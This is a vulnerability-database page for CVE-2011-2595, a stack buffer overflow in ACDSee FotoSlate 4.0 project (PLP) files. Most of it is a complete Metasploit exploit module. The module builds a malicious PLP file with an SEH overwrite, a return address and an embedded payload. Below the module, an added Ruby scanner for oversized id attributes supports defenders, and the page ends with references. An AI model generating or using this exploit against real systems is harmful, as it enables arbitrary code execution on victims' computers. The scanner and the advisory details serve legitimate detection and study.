CVE-2011-2595
Description
Multiple stack-based buffer overflows in ACDSee FotoSlate 4.0 Build 146 allow remote attackers to execute arbitrary code via a long id parameter in a (1) String or (2) Int tag in a FotoSlate Project (aka PLP) file.
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
ACDSee FotoSlate - '.PLP' File 'id' Local Overflow (Metasploit)
```ruby
##
# $Id: acdsee_fotoslate_string.rb 13853 2011-10-10 16:47:33Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ACDSee FotoSlate PLP File id Parameter Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via
        a specially crafted id parameter in a String element. When viewing a malicious
        PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a
        buffer and execute arbitrary code. This exploit has been tested on systems such as
        Windows XP SP3, Windows Vista, and Windows 7.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Parvez Anwar',  # Vulnerability discovery
          'juan vazquez'   # Metasploit module
        ],
      'Version'        => '$Revision: 13853 $',
      'References'     =>
        [
          [ 'CVE', '2011-2595' ],
          [ 'OSVDB', '75425' ],
          [ 'BID', '49558' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => 'true'
        },
      'Payload'        =>
        {
          #'Space'    => 4000,
          'BadChars' => "\x00\x22"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'ACDSee FotoSlate 4.0 Build 146',
            {
              'Ret'         => 0x263a5b57,  # pop, pop, ret from ipwssl6.dll
              'Offset'      => 1812,
              'TotalLength' => 5000
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Sep 12 2011',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.plp']),
      ], self.class)
  end

  def exploit
    # Filler up to the SEH record, then the SEH record, the payload, and
    # padding out to the total length used by the template.
    overflow = rand_text(target["Offset"])
    overflow << generate_seh_record(target.ret)
    overflow << payload.encoded
    overflow << rand_text_alpha(target["TotalLength"] - overflow.length)

    # Non-indented heredoc: the body and the TEMPLATE terminator must stay at column 0.
    plp =<<TEMPLATE
<?xml version="1.0" encoding="ISO-8859-1"?>
<ACDFotoSlateDocument15>
<PageDefinition>
<Template>
<Version>3.0</Version>
<Page>
<Name>Letter</Name>
<Properties>
<String id="#{overflow}"></String>
<String id="Width">8.500000IN</String>
<String id="Height">11.000000IN</String>
<String id="Orientation">Portrait</String>
<Bool id="AutoRotate">FALSE</Bool>
<Bool id="AutoFill">FALSE</Bool>
</Properties>
<Content>
<Bool id="UseBGColor">FALSE</Bool>
<Int id="BGImageType">0</Int>
<String id="BGImageFile"></String>
<Int id="BGColor">16777215</Int>
</Content>
</Page>
<ToolList>
<Group>
<Tool>
<Name>Image</Name>
<Properties>
<String id="XPos">0.500000IN</String>
<String id="YPos">0.500000IN</String>
<String id="Width">7.500000IN</String>
<String id="Height">10.000000IN</String>
<Float id="Tilt">0.000000</Float>
</Properties>
<Content>
<Int id="ShapeType">0</Int>
<Float id="RoundRectX">0.000000</Float>
<Float id="RoundRectY">0.000000</Float>
<Bool id="ShrinkToFit">FALSE</Bool>
<Bool id="AutoRotate">FALSE</Bool>
<Float id="BorderWidth">0.000000</Float>
<Bool id="UseBGColor">FALSE</Bool>
<Int id="BGColor">8454143</Int>
<Bool id="DropShadow">FALSE</Bool>
<Int id="DSColor">0</Int>
<Bool id="BevelEdge">FALSE</Bool>
<Bool id="Border">FALSE</Bool>
<Int id="BorderColor">16711680</Int>
<Bool id="IsLocked">FALSE</Bool>
</Content>
</Tool>
</Group>
</ToolList>
</Template>
<PageContent>
<Version>3.0</Version>
<Page>
<Name>Letter</Name>
<Content>
<Bool id="UseBGColor">FALSE</Bool>
<Int id="BGImageType">0</Int>
<String id="BGImageFile"></String>
<Int id="BGColor">16777215</Int>
</Content>
</Page>
<ToolList>
<Group>
<Tool>
<Name>Image</Name>
<Content>
<Int id="ShapeType">0</Int>
<Float id="RoundRectX">0.000000</Float>
<Float id="RoundRectY">0.000000</Float>
<Bool id="ShrinkToFit">FALSE</Bool>
<Bool id="AutoRotate">FALSE</Bool>
<Float id="BorderWidth">0.000000</Float>
<Bool id="UseBGColor">FALSE</Bool>
<Int id="BGColor">8454143</Int>
<Bool id="DropShadow">FALSE</Bool>
<Int id="DSColor">0</Int>
<Bool id="BevelEdge">FALSE</Bool>
<Bool id="Border">FALSE</Bool>
<Int id="BorderColor">16711680</Int>
<Bool id="IsLocked">FALSE</Bool>
</Content>
</Tool>
</Group>
</ToolList>
</PageContent>
</PageDefinition>
</ACDFotoSlateDocument15>
TEMPLATE

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(plp)
  end
end

=begin
After SEH, we have ~0x23C3 bytes (9155 in decimal) of space for payload. But we need to avoid
using a long buffer in order to avoid the meterpreter possibly being broken.
=end
```
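Added example, not part of this CVE record or of the Metasploit module above: a defender-side Ruby scanner that inspects a .PLP file for the trigger condition the description names, an oversized `id` attribute on a String or Int tag. It generalises slightly by also checking the Bool and Float property tags, which carry the same attribute in the template. The 1812-byte figure is the module's `'Offset'` target value; `MAX_ID_LEN` (128) is an assumed limit, chosen because every legitimate `id` in the template is a short property name; both sample documents are constructed here for the demonstration.

```ruby
# Added example (not from the CVE record or the Metasploit module): flag
# FotoSlate .PLP files whose String/Int/Bool/Float tags carry an oversized
# "id" attribute, the trigger condition described for CVE-2011-2595.

MAX_ID_LEN      = 128   # assumption: legitimate ids are short property names
OVERFLOW_OFFSET = 1812  # the module's 'Offset' target parameter

Finding = Struct.new(:tag, :length, :offset, :severity)

# Scan the raw bytes rather than using a strict XML parser, so a malformed
# or deliberately broken file is still inspected instead of raising.
def scan_plp(data)
  findings = []
  # The attribute value may contain anything except a double quote.
  data.scan(/<(String|Int|Bool|Float)\s+id="([^"]*)"/) do |tag, id|
    next if id.bytesize <= MAX_ID_LEN
    # Anything at or beyond the known overflow offset is treated as critical;
    # shorter but still abnormal ids are reported as suspicious.
    severity = id.bytesize >= OVERFLOW_OFFSET ? :critical : :suspicious
    findings << Finding.new(tag, id.bytesize, Regexp.last_match.begin(0), severity)
  end
  findings
end

# Collapse the findings into a single verdict for a file.
def verdict(data)
  findings = scan_plp(data)
  return :clean if findings.empty?
  findings.any? { |f| f.severity == :critical } ? :critical : :suspicious
end

# Constructed benign document, modelled on the shape of a FotoSlate template.
BENIGN_PLP = <<~PLP
  <?xml version="1.0" encoding="ISO-8859-1"?>
  <ACDFotoSlateDocument15>
    <Properties>
      <String id="Width">8.500000IN</String>
      <Int id="BGColor">16777215</Int>
    </Properties>
  </ACDFotoSlateDocument15>
PLP

# Constructed sample with a 2000-byte filler id inserted before the first property.
OVERSIZED_PLP = BENIGN_PLP.sub(
  '<String id="Width">',
  "<String id=\"#{'A' * 2000}\"></String><String id=\"Width\">"
)

if __FILE__ == $PROGRAM_NAME
  # Usage: ruby plp_scan.rb file1.plp file2.plp ...
  # Files are read as binary so odd bytes in the id never trip encoding checks.
  ARGV.each do |path|
    data = File.binread(path)
    puts "#{path}: #{verdict(data)}"
    scan_plp(data).each do |f|
      puts "  <#{f.tag} id=...> #{f.length} bytes at byte offset #{f.offset} (#{f.severity})"
    end
  end
end
```

The regex scan deliberately avoids a full XML parse: a file built to crash a parser is exactly the kind of input a triage tool must still read, and the byte offset in each finding points straight at the element to examine.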
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| acdsee | fotoslate | 4.0 | |
References
- http://osvdb.org/75425
- http://secunia.com/advisories/44722
- http://www.securityfocus.com/bid/49558
- https://exchange.xforce.ibmcloud.com/vulnerabilities/69723
CWEs
CWE-119